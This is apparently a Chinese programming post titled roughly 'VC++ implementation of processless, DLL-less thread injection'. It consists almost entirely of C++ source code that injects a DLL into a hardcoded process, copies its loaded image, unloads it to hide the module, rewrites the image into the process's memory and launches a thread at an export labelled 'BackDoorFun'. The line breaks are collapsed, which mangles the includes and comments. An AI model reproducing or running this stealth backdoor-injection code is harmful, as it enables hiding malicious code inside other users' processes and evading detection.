VC++实现无进程无dll线程注射技术

请见代码分析，实现线程注射

#include "stdafx.h"#include "windows.h"#include "stdio.h"#include "Psapi.h"#include "Tlhelp32.h"//获得加载的DLL模块的信息，主要包括模块基地址和模块大小BOOL GetThreadInformation(DWORD ProcessID,char* Dllfullname,MODULEENTRY32 &Thread){  HANDLE hthSnapshot = NULL;   // 取得指定进程的所有模块映象.   hthSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,ProcessID);   if (hthSnapshot == NULL)    return FALSE;  // 取得所有模块列表中的指定的模块.   BOOL bMoreMods = Module32First(hthSnapshot, &Thread);   if (bMoreMods == FALSE)   return FALSE;  // 循环取得想要的模块.   for (;bMoreMods; bMoreMods = Module32Next(hthSnapshot, &Thread))   {   if (strcmp(Thread.szExePath, Dllfullname) == 0)    break;   }  if (strcmp(Thread.szExePath, Dllfullname) == 0)   return TRUE;  else   return FALSE;}//调整进程权限BOOL AdjustPrivileges(HANDLE hProcess,LPCTSTR lpPrivilegeName){ //****************************************************** //调整进程权限 //****************************************************** HANDLE hToken;                     TOKEN_PRIVILEGES tkp;         //打开进程的权限标记 if (!::OpenProcessToken(hProcess,                  TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))      return FALSE; //传入lpPrivilegeName的Luid值    if(!::LookupPrivilegeValue(NULL,             lpPrivilegeName,              &tkp.Privileges[0].Luid))     return FALSE; tkp.PrivilegeCount = 1;      tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;  if(!::AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,                          (PTOKEN_PRIVILEGES) NULL, 0))       return FALSE; return TRUE;}//注入DLL部分BOOL InjectRemoteProcess(HANDLE hProcess,char* Dllfullname){  //开辟虚拟空间，以便写入DLL的完整路径 PSTR pDllName=NULL; if((pDllName=(PSTR)::VirtualAllocEx(hProcess,  NULL,  strlen(Dllfullname)+1,  MEM_COMMIT|MEM_RESERVE,  PAGE_EXECUTE_READWRITE))==NULL)  return FALSE; BOOL  writecode; if((writecode=::WriteProcessMemory(hProcess,  pDllName,        Dllfullname,  strlen(Dllfullname)+1,  NULL))==0)  return FALSE; //取得LoadLibrary函数在Kernel32.dll中的地址.  PTHREAD_START_ROUTINE pfnThreadRtn =    (PTHREAD_START_ROUTINE)GetProcAddress(    GetModuleHandle("Kernel32.dll"), "LoadLibraryA");  if (pfnThreadRtn== NULL)  return FALSE;    //打开远线程 HANDLE  hRemoteThread=NULL; if((hRemoteThread=::CreateRemoteThread(hProcess,  NULL,  0,        pfnThreadRtn,  pDllName,    //loadlibrary参数，即dll的路径字符串在远程进程中的地址，若是多参数则放在一个结构体中  0,  NULL))==NULL)  return FALSE; return TRUE;}//卸载DLLBOOL UnistallDll(HANDLE hProcess,BYTE  * Address){  // 取得FreeLibrary函数在Kernel32.dll中的地址. HANDLE hThread  = NULL;  PTHREAD_START_ROUTINE pfnThreadRtn =    (PTHREAD_START_ROUTINE)GetProcAddress(    GetModuleHandle("Kernel32.dll"), "FreeLibrary");  if (pfnThreadRtn == NULL)  return FALSE; // 创建远程线程来执行FreeLibrary函数.  hThread = ::CreateRemoteThread(hProcess,    NULL,    0,    pfnThreadRtn,    Address,    0,    NULL);  if (hThread == NULL)   return FALSE; // 等待远程线程终止. ::WaitForSingleObject(hThread, INFINITE);  // 关闭句柄.  ::CloseHandle(hThread); return TRUE;}#define pid 3844#define BackDoorFun 0x1014//DLL模块中导出函数的地址int main(int argc, char* argv[]){ char Dllfullname[255]; char Dllname[255]; //打开进程 HANDLE hRemoteProcess=NULL; if((hRemoteProcess=::OpenProcess(PROCESS_ALL_ACCESS,       FALSE,   pid))==NULL) {  printf("OpenProcess faile!!");  return 0; } BOOL Adjust=AdjustPrivileges(hRemoteProcess,SE_DEBUG_NAME); if(Adjust==FALSE) {  printf("Adjust process Privileges faile!!n");  return 0; } //获得DLL的完整路径    strcpy(Dllname,"dll.dll"); ::GetCurrentDirectory(255,Dllfullname);    strcat(Dllfullname,"\"); strcat(Dllfullname,Dllname); BOOL Res=InjectRemoteProcess(hRemoteProcess,Dllfullname); if(Res==FALSE) {  printf("Inject Faile!!n");  return 0; }  //等待远线程启动，否则获取不到插入的dll信息 ::Sleep(300);  DWORD RemoteTheadAddress=0; MODULEENTRY32 Thread = {sizeof(Thread)};;  RemoteTheadAddress=GetThreadInformation(pid,Dllfullname,Thread); if(RemoteTheadAddress==0) {  printf("Get RemoteTheadAddress Faile!!n");   return 0; }  //分配保存DLL加载后的的缓冲区，并保存 char *buffer=new char[Thread.modBaseSize+1]; DWORD read; ::ReadProcessMemory(hRemoteProcess,  Thread.modBaseAddr,//加载的DLL模块基地址  buffer,  Thread.modBaseSize,//加载的DLL代码的大小  &read); //卸载DLL BOOL Unstall=UnistallDll(hRemoteProcess,Thread.modBaseAddr); if(Unstall==FALSE) {  printf("Unistall dll Faile!!!n");  return 0; } //重新分配虚拟内存，注意从原模块基地址出开始分配 LPVOID Alloc; Alloc=::VirtualAllocEx(hRemoteProcess,Thread.modBaseAddr,Thread.modBaseSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); if(Alloc== NULL) {  printf("VirtualAllocEx Failed!!n");  return 0; } BOOL Writer;DWORD Written; Writer=::WriteProcessMemory(hRemoteProcess,Thread.modBaseAddr,buffer,Thread.modBaseSize,&Written); if(Writer==0) {  printf("WriteProcessMemory Failed!!n");  return 0; } //重新启动新的无DLL模块的线程中的函数 HANDLE  hNewThread=NULL; if((hNewThread=::CreateRemoteThread(hRemoteProcess,  NULL,  0,  (PTHREAD_START_ROUTINE)(Thread.modBaseAddr+BackDoorFun),//添加到进程中的数据的基地址Thread.modBaseAddr+dll导出函数的入口点地址  NULL, //此处填写导出函数的参数地址，为简单期间，本导出函数没有参数，若有参数可用注入DLL中同样方法写进进程空间中  0,  NULL))==NULL)    {  printf("CreateNewThread faile!!n");  return 0; } return 0;}